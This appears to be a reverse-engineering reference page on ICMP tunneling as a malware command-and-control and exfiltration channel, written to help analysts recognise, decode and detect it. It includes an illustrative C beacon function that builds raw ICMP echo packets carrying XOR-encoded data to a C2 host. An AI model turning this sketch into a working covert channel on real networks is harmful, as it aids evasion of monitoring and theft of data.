Skip to content
Reverse Engineering
Command & Controlintermediate

ICMP Tunneling

Malware smuggles C2 commands and data inside ICMP echo payloads, riding a non-application-layer protocol many networks pass without inspection.

ICMP is a control protocol — ping and traceroute live here — and it is frequently allowed outbound with little or no inspection, since blocking it breaks legitimate diagnostics. ICMP tunneling abuses the fact that an echo request (type 8) and its echo reply (type 0) both carry an arbitrary data field. Malware stuffs commands, responses, and exfiltrated bytes into that payload, turning ordinary-looking pings into a bidirectional covert channel that bypasses application-layer proxies entirely.

The channel is attractive precisely because it operates below the application layer: there is no URL, no TLS SNI, no DNS query for a content filter to inspect. Throughput is modest and the traffic is connectionless, so ICMP tunneling tends to be used for stealthy command exchange and slow exfiltration rather than bulk transfer. Pingback used ICMP echo data for its C2, the icmpsh family provides a reverse ICMP shell, and APT41's LOWKEY supported an ICMP-based variant.

For an analyst the task is to recognise that a sample crafts raw ICMP packets, recover how it frames and encodes the payload, and decode captured echo traffic to read both sides of the conversation.

How it works

The implant builds raw ICMP echo packets, places encoded C2 data in the payload, and the operator replies in kind, reusing the identifier so the OS pairs request and reply:

c
// Illustrative ICMP framing — descriptive, not deployable.
// Encoded command/response bytes ride in the echo data field.
void icmp_beacon(int raw_sock, struct sockaddr *c2,
                 const uint8_t *data, size_t len)
{
    uint8_t pkt[1500];
    struct icmphdr *h = (struct icmphdr *)pkt;
    h->type = ICMP_ECHO;                 // type 8, looks like ping
    h->code = 0;
    h->un.echo.id = 0x1337;              // fixed id pairs the session
    h->un.echo.sequence = next_seq();    // sequencing for reassembly

    // payload carries obfuscated tasking/response, not "abcdef..."
    size_t n = (len > 1400) ? 1400 : len;
    xor_encode(data, n, pkt + sizeof *h, 0x5A);
    h->checksum = 0;
    h->checksum = inet_csum(pkt, sizeof *h + n);
    sendto(raw_sock, pkt, sizeof *h + n, 0, c2, sizeof(struct sockaddr));
}

The C2 listener decodes the echo data, executes the command, and returns output inside echo replies. Tells for a reverser: creation of a raw or SOCK_RAW/IPPROTO_ICMP socket (often requiring elevated privileges), manual ICMP header construction, a fixed echo identifier, a checksum routine, and an encode/decode step applied to the payload — benign ping utilities never obfuscate their data field or carry high-entropy bytes there.

Detection & analysis

Static analysis:

  • Look for raw-socket setup (socket(AF_INET, SOCK_RAW, IPPROTO_ICMP) on Linux, IcmpSendEcho/Winsock raw sockets or a packet driver on Windows) combined with hand-built ICMP headers. The presence of an ICMP checksum routine and a fixed echo id next to an XOR/RC4/base64 step on the payload is the defining static marker.
  • Recover the encoding key and the framing (sequence handling, any magic bytes or length prefix in the payload). This lets you decode captured echo data offline and read both tasking and exfiltrated output.
  • Note the hard-coded C2 address that sendto targets — a single fixed destination receiving a stream of echo requests reveals the server.

Dynamic analysis:

  • Capture ICMP in a sandbox and inspect the echo data field. Benign pings use a small, fixed, low-entropy padding pattern; tunneling shows variable-length, high-entropy, or printable-but-structured payloads, frequently larger than the OS default ping size.
  • Measure echo volume and directionality: a sustained, two-way stream of echo request/reply to a single external host — especially with a constant identifier and payloads that change every packet — is anomalous for any normal diagnostic use.
  • Decode the captured payloads with the reversed encoder to reconstruct the commands and any exfiltrated data.

Detection rule hint:

Alert when a host exchanges a sustained bidirectional stream of ICMP echo request/reply with a single external peer where the payload length deviates from the OS default and the data field carries high Shannon entropy or non-repeating content — abnormal, high-entropy, variable echo payloads to one destination are the hallmark of an ICMP tunnel, never of legitimate ping.

Votes

Comments(0)